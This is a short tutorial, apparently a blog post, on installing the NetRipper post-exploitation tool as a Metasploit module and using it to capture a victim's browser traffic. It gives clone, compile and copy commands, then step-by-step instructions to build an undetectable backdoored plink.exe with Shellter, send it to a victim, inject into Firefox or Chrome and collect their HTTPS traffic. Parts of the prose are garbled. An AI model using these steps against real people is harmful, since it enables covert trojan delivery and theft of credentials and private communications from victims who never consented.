NetRipper is a fairly recent tool that is based on Windows and uses a number of approaches to extract sensitive data.
Uses an API connection to monitor network traffic encrypted by a guest user, being able to capture both simple traffic and encrypted traffic before encryption / others and after decryption. This tool was first introduced at Defcon 23 in Vegas.
[email protected]:~/Desktop# git clone https://github.com/NytroRST/NetRipper.git [email protected]:~/Desktop# cd NetRipper/Metasploit/ [email protected]:~/Desktop/NetRipper/Metasploit# cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb [email protected]:~/Desktop/NetRipper/Metasploit# mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper [email protected]:~/Desktop/NetRipper/Metasploit# g++ -Wall netripper.cpp -o netripper [email protected]:~/Desktop/NetRipper/Metasploit# cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper [email protected]:~/Desktop/NetRipper/Metasploit# cd ../Release/ [email protected]:~/Desktop/NetRipper/Release# cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll
Creation FUD payload with the Shellter
1. Download and run the Shellter
2. Select Operation Mode and Goal [executable file for backdoor integration], in this wizard I am going to use the plink.exe file
3. Configure your payload by setting the LHOST, RPORT parameter
4. Run Metasploit
5. We send the backdoored file to our victim and wait for it to run
6. I am going to inject firefox.exe. You can also do the same in Google Chrome.
7. And now all the data from these processes start to be stored in the user's temporary directory.
8. Now, you can receive all the victim traffic (include HTTPS traffic)
You will find the program here